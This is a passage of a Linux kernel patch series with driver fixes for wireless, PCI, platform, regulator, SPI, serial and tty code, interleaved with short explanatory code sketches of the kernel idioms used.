+ 		dev->features |= NETIF_F_GRO_HW;
+diff --git a/drivers/net/wireless/ath/ath.h b/drivers/net/wireless/ath/ath.h
+index f02a308a9ffc5..34654f710d8a1 100644
+--- a/drivers/net/wireless/ath/ath.h
++++ b/drivers/net/wireless/ath/ath.h
+@@ -171,8 +171,10 @@ struct ath_common {
+ 	unsigned int clockrate;
+ 
+ 	spinlock_t cc_lock;
+-	struct ath_cycle_counters cc_ani;
+-	struct ath_cycle_counters cc_survey;
++	struct_group(cc,
++		struct ath_cycle_counters cc_ani;
++		struct ath_cycle_counters cc_survey;
++	);
+ 
+ 	struct ath_regulatory regulatory;
+ 	struct ath_regulatory reg_world_copy;
+diff --git a/drivers/net/wireless/ath/ath9k/main.c b/drivers/net/wireless/ath/ath9k/main.c
+index 6360d3356e256..81412a67c1cbd 100644
+--- a/drivers/net/wireless/ath/ath9k/main.c
++++ b/drivers/net/wireless/ath/ath9k/main.c
+@@ -135,8 +135,7 @@ void ath9k_ps_wakeup(struct ath_softc *sc)
+ 	if (power_mode != ATH9K_PM_AWAKE) {
+ 		spin_lock(&common->cc_lock);
+ 		ath_hw_cycle_counters_update(common);
+-		memset(&common->cc_survey, 0, sizeof(common->cc_survey));
+-		memset(&common->cc_ani, 0, sizeof(common->cc_ani));
++		memset(&common->cc, 0, sizeof(common->cc));
+ 		spin_unlock(&common->cc_lock);
+ 	}
+ 
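
The ath change wraps the two cycle counters in struct_group() so a single bounded memset can clear exactly those members. A kernel-context sketch of the construct with reduced stand-in types (not the ath structures):

#include <linux/stddef.h>
#include <linux/string.h>
#include <linux/types.h>

struct my_counters {
	u32 cycles;
	u32 rx_busy;
};

struct my_common {
	unsigned int clockrate;
	struct_group(cc,
		struct my_counters cc_ani;
		struct my_counters cc_survey;
	);
};

static void my_reset_counters(struct my_common *c)
{
	/* Covers cc_ani and cc_survey, nothing else; the bound is
	 * checkable by FORTIFY_SOURCE against the group's size. */
	memset(&c->cc, 0, sizeof(c->cc));
}
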
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+index 49ddca84f7862..cae7c21ca1f8b 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+@@ -883,6 +883,7 @@ void mt7921_mac_reset_work(struct work_struct *work)
+ 	int i, ret;
+ 
+ 	dev_dbg(dev->mt76.dev, "chip reset\n");
++	set_bit(MT76_RESET, &dev->mphy.state);
+ 	dev->hw_full_reset = true;
+ 	ieee80211_stop_queues(hw);
+ 
+@@ -911,6 +912,7 @@ void mt7921_mac_reset_work(struct work_struct *work)
+ 	}
+ 
+ 	dev->hw_full_reset = false;
++	clear_bit(MT76_RESET, &dev->mphy.state);
+ 	pm->suspended = false;
+ 	ieee80211_wake_queues(hw);
+ 	ieee80211_iterate_active_interfaces(hw,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci_mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci_mac.c
+index 8dd60408b117e..cb20ddcad137c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci_mac.c
+@@ -78,7 +78,6 @@ int mt7921e_mac_reset(struct mt7921_dev *dev)
+ 	mt76_wr(dev, MT_WFDMA0_HOST_INT_ENA, 0);
+ 	mt76_wr(dev, MT_PCIE_MAC_INT_ENABLE, 0x0);
+ 
+-	set_bit(MT76_RESET, &dev->mphy.state);
+ 	set_bit(MT76_MCU_RESET, &dev->mphy.state);
+ 	wake_up(&dev->mt76.mcu.wait);
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+@@ -129,7 +128,6 @@ int mt7921e_mac_reset(struct mt7921_dev *dev)
+ 
+ 	err = __mt7921_start(&dev->phy);
+ out:
+-	clear_bit(MT76_RESET, &dev->mphy.state);
+ 
+ 	local_bh_disable();
+ 	napi_enable(&dev->mt76.tx_napi);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
+index fd07b66233920..46af03803de73 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
+@@ -98,7 +98,6 @@ int mt7921s_mac_reset(struct mt7921_dev *dev)
+ 	mt76_connac_free_pending_tx_skbs(&dev->pm, NULL);
+ 	mt76_txq_schedule_all(&dev->mphy);
+ 	mt76_worker_disable(&dev->mt76.tx_worker);
+-	set_bit(MT76_RESET, &dev->mphy.state);
+ 	set_bit(MT76_MCU_RESET, &dev->mphy.state);
+ 	wake_up(&dev->mt76.mcu.wait);
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+@@ -135,7 +134,6 @@ int mt7921s_mac_reset(struct mt7921_dev *dev)
+ 
+ 	err = __mt7921_start(&dev->phy);
+ out:
+-	clear_bit(MT76_RESET, &dev->mphy.state);
+ 
+ 	mt76_worker_enable(&dev->mt76.tx_worker);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio.c b/drivers/net/wireless/mediatek/mt76/sdio.c
+index fc4fb94635645..2a81c2f663449 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio.c
+@@ -499,7 +499,8 @@ static void mt76s_tx_status_data(struct mt76_worker *worker)
+ 	dev = container_of(sdio, struct mt76_dev, sdio);
+ 
+ 	while (true) {
+-		if (test_bit(MT76_REMOVED, &dev->phy.state))
++		if (test_bit(MT76_RESET, &dev->phy.state) ||
++		    test_bit(MT76_REMOVED, &dev->phy.state))
+ 			break;
+ 
+ 		if (!dev->drv->tx_status_data(dev, &update))
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 67956bfebf879..0399204941dbe 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -2991,6 +2991,18 @@ static const struct dmi_system_id bridge_d3_blacklist[] = {
+ 			DMI_MATCH(DMI_BOARD_VERSION, "Continental Z2"),
+ 		},
+ 	},
++	{
++		/*
++		 * Changing the power state of the root port the dGPU is connected to fails
++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/3229
++		 */
++		.ident = "Hewlett-Packard HP Pavilion 17 Notebook PC/1972",
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Hewlett-Packard"),
++			DMI_MATCH(DMI_BOARD_NAME, "1972"),
++			DMI_MATCH(DMI_BOARD_VERSION, "95.33"),
++		},
++	},
+ #endif
+ 	{ }
+ };
+diff --git a/drivers/platform/x86/p2sb.c b/drivers/platform/x86/p2sb.c
+index a64f56ddd4a44..053be5c5e0cad 100644
+--- a/drivers/platform/x86/p2sb.c
++++ b/drivers/platform/x86/p2sb.c
+@@ -56,12 +56,9 @@ static int p2sb_get_devfn(unsigned int *devfn)
+ 	return 0;
+ }
+ 
+-static bool p2sb_valid_resource(struct resource *res)
++static bool p2sb_valid_resource(const struct resource *res)
+ {
+-	if (res->flags)
+-		return true;
+-
+-	return false;
++	return res->flags & ~IORESOURCE_UNSET;
+ }
+ 
+ /* Copy resource from the first BAR of the device in question */
+@@ -220,16 +217,20 @@ EXPORT_SYMBOL_GPL(p2sb_bar);
+ 
+ static int __init p2sb_fs_init(void)
+ {
+-	p2sb_cache_resources();
+-	return 0;
++	return p2sb_cache_resources();
+ }
+ 
+ /*
+- * pci_rescan_remove_lock to avoid access to unhidden P2SB devices can
+- * not be locked in sysfs pci bus rescan path because of deadlock. To
+- * avoid the deadlock, access to P2SB devices with the lock at an early
+- * step in kernel initialization and cache required resources. This
+- * should happen after subsys_initcall which initializes PCI subsystem
+- * and before device_initcall which requires P2SB resources.
++ * pci_rescan_remove_lock() cannot be taken in the sysfs PCI bus rescan path
++ * because of deadlock. To avoid the deadlock, access P2SB devices with the lock
++ * at an early step in kernel initialization and cache required resources.
++ *
++ * We want to run as early as possible. If the P2SB was assigned a bad BAR,
++ * we'll need to wait on pcibios_assign_resources() to fix it. So, our list of
++ * initcall dependencies looks something like this:
++ *
++ * ...
++ * subsys_initcall (pci_subsys_init)
++ * fs_initcall     (pcibios_assign_resources)
+  */
+-fs_initcall(p2sb_fs_init);
++fs_initcall_sync(p2sb_fs_init);
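
The switch to fs_initcall_sync() relies on the rule that the *_sync variant of an initcall level runs after the plain level, so the P2SB cache is populated after pcibios_assign_resources() (an fs_initcall) has fixed up any bad BAR. A minimal sketch of registering at that level (the function is invented):

#include <linux/init.h>

static int __init my_p2sb_like_cache(void)
{
	/* BARs are assigned by now; safe to snapshot resources here. */
	return 0;
}
fs_initcall_sync(my_p2sb_like_cache);
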
+diff --git a/drivers/platform/x86/toshiba_acpi.c b/drivers/platform/x86/toshiba_acpi.c
+index 160abd3b3af8b..f10994b94a33a 100644
+--- a/drivers/platform/x86/toshiba_acpi.c
++++ b/drivers/platform/x86/toshiba_acpi.c
+@@ -57,6 +57,11 @@ module_param(turn_on_panel_on_resume, int, 0644);
+ MODULE_PARM_DESC(turn_on_panel_on_resume,
+ 	"Call HCI_PANEL_POWER_ON on resume (-1 = auto, 0 = no, 1 = yes");
+ 
++static int hci_hotkey_quickstart = -1;
++module_param(hci_hotkey_quickstart, int, 0644);
++MODULE_PARM_DESC(hci_hotkey_quickstart,
++		 "Call HCI_HOTKEY_EVENT with value 0x5 for quickstart button support (-1 = auto, 0 = no, 1 = yes");
++
+ #define TOSHIBA_WMI_EVENT_GUID "59142400-C6A3-40FA-BADB-8A2652834100"
+ 
+ /* Scan code for Fn key on TOS1900 models */
+@@ -136,6 +141,7 @@ MODULE_PARM_DESC(turn_on_panel_on_resume,
+ #define HCI_ACCEL_MASK			0x7fff
+ #define HCI_ACCEL_DIRECTION_MASK	0x8000
+ #define HCI_HOTKEY_DISABLE		0x0b
++#define HCI_HOTKEY_ENABLE_QUICKSTART	0x05
+ #define HCI_HOTKEY_ENABLE		0x09
+ #define HCI_HOTKEY_SPECIAL_FUNCTIONS	0x10
+ #define HCI_LCD_BRIGHTNESS_BITS		3
+@@ -2730,10 +2736,15 @@ static int toshiba_acpi_enable_hotkeys(struct toshiba_acpi_dev *dev)
+ 		return -ENODEV;
+ 
+ 	/*
++	 * Enable quickstart buttons if supported.
++	 *
+ 	 * Enable the "Special Functions" mode only if they are
+ 	 * supported and if they are activated.
+ 	 */
+-	if (dev->kbd_function_keys_supported && dev->special_functions)
++	if (hci_hotkey_quickstart)
++		result = hci_write(dev, HCI_HOTKEY_EVENT,
++				   HCI_HOTKEY_ENABLE_QUICKSTART);
++	else if (dev->kbd_function_keys_supported && dev->special_functions)
+ 		result = hci_write(dev, HCI_HOTKEY_EVENT,
+ 				   HCI_HOTKEY_SPECIAL_FUNCTIONS);
+ 	else
+@@ -3259,7 +3270,14 @@ static const char *find_hci_method(acpi_handle handle)
+  * works. toshiba_acpi_resume() uses HCI_PANEL_POWER_ON to avoid changing
+  * the configured brightness level.
+  */
+-static const struct dmi_system_id turn_on_panel_on_resume_dmi_ids[] = {
++#define QUIRK_TURN_ON_PANEL_ON_RESUME		BIT(0)
++/*
++ * Some Toshibas use "quickstart" keys. On these, HCI_HOTKEY_EVENT must use
++ * the value HCI_HOTKEY_ENABLE_QUICKSTART.
++ */
++#define QUIRK_HCI_HOTKEY_QUICKSTART		BIT(1)
++
++static const struct dmi_system_id toshiba_dmi_quirks[] = {
+ 	{
+ 	 /* Toshiba Portégé R700 */
+ 	 /* https://bugzilla.kernel.org/show_bug.cgi?id=21012 */
+@@ -3267,6 +3285,7 @@ static const struct dmi_system_id turn_on_panel_on_resume_dmi_ids[] = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "PORTEGE R700"),
+ 		},
++	 .driver_data = (void *)QUIRK_TURN_ON_PANEL_ON_RESUME,
+ 	},
+ 	{
+ 	 /* Toshiba Satellite/Portégé R830 */
+@@ -3276,6 +3295,7 @@ static const struct dmi_system_id turn_on_panel_on_resume_dmi_ids[] = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "R830"),
+ 		},
++	 .driver_data = (void *)QUIRK_TURN_ON_PANEL_ON_RESUME,
+ 	},
+ 	{
+ 	 /* Toshiba Satellite/Portégé Z830 */
+@@ -3283,6 +3303,7 @@ static const struct dmi_system_id turn_on_panel_on_resume_dmi_ids[] = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Z830"),
+ 		},
++	 .driver_data = (void *)(QUIRK_TURN_ON_PANEL_ON_RESUME | QUIRK_HCI_HOTKEY_QUICKSTART),
+ 	},
+ };
+ 
+@@ -3291,6 +3312,8 @@ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+ 	struct toshiba_acpi_dev *dev;
+ 	const char *hci_method;
+ 	u32 dummy;
++	const struct dmi_system_id *dmi_id;
++	long quirks = 0;
+ 	int ret = 0;
+ 
+ 	if (toshiba_acpi)
+@@ -3443,8 +3466,15 @@ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+ 	}
+ #endif
+ 
++	dmi_id = dmi_first_match(toshiba_dmi_quirks);
++	if (dmi_id)
++		quirks = (long)dmi_id->driver_data;
++
+ 	if (turn_on_panel_on_resume == -1)
+-		turn_on_panel_on_resume = dmi_check_system(turn_on_panel_on_resume_dmi_ids);
++		turn_on_panel_on_resume = !!(quirks & QUIRK_TURN_ON_PANEL_ON_RESUME);
++
++	if (hci_hotkey_quickstart == -1)
++		hci_hotkey_quickstart = !!(quirks & QUIRK_HCI_HOTKEY_QUICKSTART);
+ 
+ 	toshiba_wwan_available(dev);
+ 	if (dev->wwan_supported)
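
The toshiba_acpi rework folds several DMI tables into one whose driver_data carries a bitmask of quirks, decoded once with dmi_first_match(). A kernel-context sketch of the pattern with illustrative table contents (QUIRK_FOO/QUIRK_BAR and the match strings are placeholders):

#include <linux/bits.h>
#include <linux/dmi.h>

#define QUIRK_FOO	BIT(0)
#define QUIRK_BAR	BIT(1)

static const struct dmi_system_id my_quirks[] = {
	{
		.matches = {
			DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
			DMI_MATCH(DMI_PRODUCT_NAME, "Z830"),
		},
		.driver_data = (void *)(QUIRK_FOO | QUIRK_BAR),
	},
	{ }
};

static long my_get_quirks(void)
{
	const struct dmi_system_id *id = dmi_first_match(my_quirks);

	/* One table, independent quirk bits: callers test each flag. */
	return id ? (long)id->driver_data : 0;
}
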
+diff --git a/drivers/power/supply/cros_usbpd-charger.c b/drivers/power/supply/cros_usbpd-charger.c
+index b6c96376776a9..8008e31c0c098 100644
+--- a/drivers/power/supply/cros_usbpd-charger.c
++++ b/drivers/power/supply/cros_usbpd-charger.c
+@@ -5,6 +5,7 @@
+  * Copyright (c) 2014 - 2018 Google, Inc
+  */
+ 
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+ #include <linux/platform_data/cros_ec_commands.h>
+ #include <linux/platform_data/cros_ec_proto.h>
+@@ -711,16 +712,22 @@ static int cros_usbpd_charger_resume(struct device *dev)
+ static SIMPLE_DEV_PM_OPS(cros_usbpd_charger_pm_ops, NULL,
+ 			 cros_usbpd_charger_resume);
+ 
++static const struct platform_device_id cros_usbpd_charger_id[] = {
++	{ DRV_NAME, 0 },
++	{}
++};
++MODULE_DEVICE_TABLE(platform, cros_usbpd_charger_id);
++
+ static struct platform_driver cros_usbpd_charger_driver = {
+ 	.driver = {
+ 		.name = DRV_NAME,
+ 		.pm = &cros_usbpd_charger_pm_ops,
+ 	},
+-	.probe = cros_usbpd_charger_probe
++	.probe = cros_usbpd_charger_probe,
++	.id_table = cros_usbpd_charger_id,
+ };
+ 
+ module_platform_driver(cros_usbpd_charger_driver);
+ 
+ MODULE_LICENSE("GPL");
+ MODULE_DESCRIPTION("ChromeOS EC USBPD charger");
+-MODULE_ALIAS("platform:" DRV_NAME);
+diff --git a/drivers/ptp/ptp_sysfs.c b/drivers/ptp/ptp_sysfs.c
+index 74b9c794d6363..1263612ef2759 100644
+--- a/drivers/ptp/ptp_sysfs.c
++++ b/drivers/ptp/ptp_sysfs.c
+@@ -283,8 +283,7 @@ static ssize_t max_vclocks_store(struct device *dev,
+ 	if (max < ptp->n_vclocks)
+ 		goto out;
+ 
+-	size = sizeof(int) * max;
+-	vclock_index = kzalloc(size, GFP_KERNEL);
++	vclock_index = kcalloc(max, sizeof(int), GFP_KERNEL);
+ 	if (!vclock_index) {
+ 		err = -ENOMEM;
+ 		goto out;
+diff --git a/drivers/regulator/bd71815-regulator.c b/drivers/regulator/bd71815-regulator.c
+index c2b8b8be78242..4696255fca5d7 100644
+--- a/drivers/regulator/bd71815-regulator.c
++++ b/drivers/regulator/bd71815-regulator.c
+@@ -257,7 +257,7 @@ static int buck12_set_hw_dvs_levels(struct device_node *np,
+  * 10: 2.50mV/usec	10mV 4uS
+  * 11: 1.25mV/usec	10mV 8uS
+  */
+-static const unsigned int bd7181x_ramp_table[] = { 1250, 2500, 5000, 10000 };
++static const unsigned int bd7181x_ramp_table[] = { 10000, 5000, 2500, 1250 };
+ 
+ static int bd7181x_led_set_current_limit(struct regulator_dev *rdev,
+ 					int min_uA, int max_uA)
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index ff11f37e28c71..518b64b2d69bc 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -3341,6 +3341,7 @@ struct regmap *regulator_get_regmap(struct regulator *regulator)
+ 
+ 	return map ? map : ERR_PTR(-EOPNOTSUPP);
+ }
++EXPORT_SYMBOL_GPL(regulator_get_regmap);
+ 
+ /**
+  * regulator_get_hardware_vsel_register - get the HW voltage selector register
+diff --git a/drivers/scsi/qedi/qedi_debugfs.c b/drivers/scsi/qedi/qedi_debugfs.c
+index 8deb2001dc2ff..37eed6a278164 100644
+--- a/drivers/scsi/qedi/qedi_debugfs.c
++++ b/drivers/scsi/qedi/qedi_debugfs.c
+@@ -120,15 +120,11 @@ static ssize_t
+ qedi_dbg_do_not_recover_cmd_read(struct file *filp, char __user *buffer,
+ 				 size_t count, loff_t *ppos)
+ {
+-	size_t cnt = 0;
+-
+-	if (*ppos)
+-		return 0;
++	char buf[64];
++	int len;
+ 
+-	cnt = sprintf(buffer, "do_not_recover=%d\n", qedi_do_not_recover);
+-	cnt = min_t(int, count, cnt - *ppos);
+-	*ppos += cnt;
+-	return cnt;
++	len = sprintf(buf, "do_not_recover=%d\n", qedi_do_not_recover);
++	return simple_read_from_buffer(buffer, count, ppos, buf, len);
+ }
+ 
+ static int
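
The qedi hunk replaces hand-rolled *ppos bookkeeping (which also wrote through the __user pointer with sprintf) with the canonical pattern: format into a bounded stack buffer, then let simple_read_from_buffer() handle the offset, short reads, and the copy to userspace. A kernel-context sketch (my_flag and the function name are invented):

#include <linux/fs.h>
#include <linux/kernel.h>

static int my_flag;

static ssize_t my_debugfs_read(struct file *filp, char __user *buffer,
			       size_t count, loff_t *ppos)
{
	char buf[64];
	int len;

	len = scnprintf(buf, sizeof(buf), "my_flag=%d\n", my_flag);
	return simple_read_from_buffer(buffer, count, ppos, buf, len);
}
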
+diff --git a/drivers/soc/ti/ti_sci_pm_domains.c b/drivers/soc/ti/ti_sci_pm_domains.c
+index a33ec7eaf23d1..17984a7bffba5 100644
+--- a/drivers/soc/ti/ti_sci_pm_domains.c
++++ b/drivers/soc/ti/ti_sci_pm_domains.c
+@@ -114,6 +114,18 @@ static const struct of_device_id ti_sci_pm_domain_matches[] = {
+ };
+ MODULE_DEVICE_TABLE(of, ti_sci_pm_domain_matches);
+ 
++static bool ti_sci_pm_idx_exists(struct ti_sci_genpd_provider *pd_provider, u32 idx)
++{
++	struct ti_sci_pm_domain *pd;
++
++	list_for_each_entry(pd, &pd_provider->pd_list, node) {
++		if (pd->idx == idx)
++			return true;
++	}
++
++	return false;
++}
++
+ static int ti_sci_pm_domain_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+@@ -153,8 +165,14 @@ static int ti_sci_pm_domain_probe(struct platform_device *pdev)
+ 				break;
+ 
+ 			if (args.args_count >= 1 && args.np == dev->of_node) {
+-				if (args.args[0] > max_id)
++				if (args.args[0] > max_id) {
+ 					max_id = args.args[0];
++				} else {
++					if (ti_sci_pm_idx_exists(pd_provider, args.args[0])) {
++						index++;
++						continue;
++					}
++				}
+ 
+ 				pd = devm_kzalloc(dev, sizeof(*pd), GFP_KERNEL);
+ 				if (!pd)
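
The new ti_sci_pm_idx_exists() above is a plain existence check over the provider's domain list, used to skip duplicate indices during the probe walk. Its shape, reduced to what the walk needs (struct layout is a stand-in):

#include <linux/list.h>
#include <linux/types.h>

struct my_pd {
	struct list_head node;
	u32 idx;
};

/* Report whether a domain with this index was already registered. */
static bool my_idx_exists(struct list_head *pd_list, u32 idx)
{
	struct my_pd *pd;

	list_for_each_entry(pd, pd_list, node)
		if (pd->idx == idx)
			return true;

	return false;
}
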
+diff --git a/drivers/spi/spi-stm32-qspi.c b/drivers/spi/spi-stm32-qspi.c
+index 9131660c1afb2..11cd7f20a80bf 100644
+--- a/drivers/spi/spi-stm32-qspi.c
++++ b/drivers/spi/spi-stm32-qspi.c
+@@ -350,7 +350,7 @@ static int stm32_qspi_wait_poll_status(struct stm32_qspi *qspi)
+ 
+ static int stm32_qspi_get_mode(u8 buswidth)
+ {
+-	if (buswidth == 4)
++	if (buswidth >= 4)
+ 		return CCR_BUSWIDTH_4;
+ 
+ 	return buswidth;
+@@ -654,9 +654,7 @@ static int stm32_qspi_setup(struct spi_device *spi)
+ 		return -EINVAL;
+ 
+ 	mode = spi->mode & (SPI_TX_OCTAL | SPI_RX_OCTAL);
+-	if ((mode == SPI_TX_OCTAL || mode == SPI_RX_OCTAL) ||
+-	    ((mode == (SPI_TX_OCTAL | SPI_RX_OCTAL)) &&
+-	    gpiod_count(qspi->dev, "cs") == -ENOENT)) {
++	if (mode && gpiod_count(qspi->dev, "cs") == -ENOENT) {
+ 		dev_err(qspi->dev, "spi-rx-bus-width\\/spi-tx-bus-width\\/cs-gpios\n");
+ 		dev_err(qspi->dev, "configuration not supported\n");
+ 
+@@ -677,10 +675,10 @@ static int stm32_qspi_setup(struct spi_device *spi)
+ 	qspi->cr_reg = CR_APMS | 3 << CR_FTHRES_SHIFT | CR_SSHIFT | CR_EN;
+ 
+ 	/*
+-	 * Dual flash mode is only enable in case SPI_TX_OCTAL and SPI_TX_OCTAL
+-	 * are both set in spi->mode and "cs-gpios" properties is found in DT
++	 * Dual flash mode is only enabled in case SPI_TX_OCTAL or SPI_RX_OCTAL
++	 * is set in spi->mode and the "cs-gpios" property is found in DT
+ 	 */
+-	if (mode == (SPI_TX_OCTAL | SPI_RX_OCTAL)) {
++	if (mode) {
+ 		qspi->cr_reg |= CR_DFM;
+ 		dev_dbg(qspi->dev, "Dual flash mode enable");
+ 	}
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index 55451ff846520..b5ae6ec61c9fb 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -41,8 +41,50 @@
+ #define PCI_DEVICE_ID_COMMTECH_4228PCIE		0x0021
+ #define PCI_DEVICE_ID_COMMTECH_4222PCIE		0x0022
+ 
++#define PCI_VENDOR_ID_CONNECT_TECH				0x12c4
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_SP_OPTO        0x0340
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_SP_OPTO_A      0x0341
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_SP_OPTO_B      0x0342
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_XPRS           0x0350
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XPRS_A         0x0351
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XPRS_B         0x0352
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS           0x0353
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_16_XPRS_A        0x0354
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_16_XPRS_B        0x0355
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_XPRS_OPTO      0x0360
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XPRS_OPTO_A    0x0361
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XPRS_OPTO_B    0x0362
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_SP             0x0370
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_SP_232         0x0371
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_SP_485         0x0372
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_4_SP           0x0373
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_6_2_SP           0x0374
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_6_SP           0x0375
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_SP_232_NS      0x0376
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_XP_OPTO_LEFT   0x0380
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_XP_OPTO_RIGHT  0x0381
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XP_OPTO        0x0382
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_4_XPRS_OPTO    0x0392
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS_LP        0x03A0
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS_LP_232    0x03A1
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS_LP_485    0x03A2
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS_LP_232_NS 0x03A3
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XEG001               0x0602
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_BASE           0x1000
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_2              0x1002
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_4              0x1004
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_8              0x1008
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_12             0x100C
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_16             0x1010
++#define PCI_DEVICE_ID_CONNECT_TECH_PCI_XR79X_12_XIG00X          0x110c
++#define PCI_DEVICE_ID_CONNECT_TECH_PCI_XR79X_12_XIG01X          0x110d
++#define PCI_DEVICE_ID_CONNECT_TECH_PCI_XR79X_16                 0x1110
++
+ #define PCI_DEVICE_ID_EXAR_XR17V4358		0x4358
+ #define PCI_DEVICE_ID_EXAR_XR17V8358		0x8358
++#define PCI_DEVICE_ID_EXAR_XR17V252		0x0252
++#define PCI_DEVICE_ID_EXAR_XR17V254		0x0254
++#define PCI_DEVICE_ID_EXAR_XR17V258		0x0258
+ 
+ #define PCI_SUBDEVICE_ID_USR_2980		0x0128
+ #define PCI_SUBDEVICE_ID_USR_2981		0x0129
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index 573bf7e9b7978..b20abaa9ef150 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -27,6 +27,7 @@
+ #include <linux/of.h>
+ #include <linux/of_device.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/dma-mapping.h>
+ 
+ #include <asm/irq.h>
+@@ -2028,7 +2029,7 @@ imx_uart_console_write(struct console *co, const char *s, unsigned int count)
+ 	struct imx_port *sport = imx_uart_ports[co->index];
+ 	struct imx_port_ucrs old_ucr;
+ 	unsigned long flags;
+-	unsigned int ucr1;
++	unsigned int ucr1, usr2;
+ 	int locked = 1;
+ 
+ 	if (sport->port.sysrq)
+@@ -2059,8 +2060,8 @@ imx_uart_console_write(struct console *co, const char *s, unsigned int count)
+ 	 *	Finally, wait for transmitter to become empty
+ 	 *	and restore UCR1/2/3
+ 	 */
+-	while (!(imx_uart_readl(sport, USR2) & USR2_TXDC));
+-
++	read_poll_timeout_atomic(imx_uart_readl, usr2, usr2 & USR2_TXDC,
++				 0, USEC_PER_SEC, false, sport, USR2);
+ 	imx_uart_ucrs_restore(sport, &old_ucr);
+ 
+ 	if (locked)
+diff --git a/drivers/tty/tty_ldisc.c b/drivers/tty/tty_ldisc.c
+index 776d8a62f77cc..7ca7731fa78ae 100644
+--- a/drivers/tty/tty_ldisc.c
++++ b/drivers/tty/tty_ldisc.c
+@@ -546,6 +546,12 @@ int tty_set_ldisc(struct tty_struct *tty, int disc)
+ 		goto out;
+ 	}
+ 
++	if (tty->ops->ldisc_ok) {
++		retval = tty->ops->ldisc_ok(tty, disc);
++		if (retval)
++			goto out;
++	}
++
+ 	old_ldisc = tty->ldisc;
+ 
+ 	/* Shutdown the old discipline. */
+diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
+index 48a9ed7c93c97..e2f9348725ff1 100644
+--- a/drivers/tty/vt/vt.c
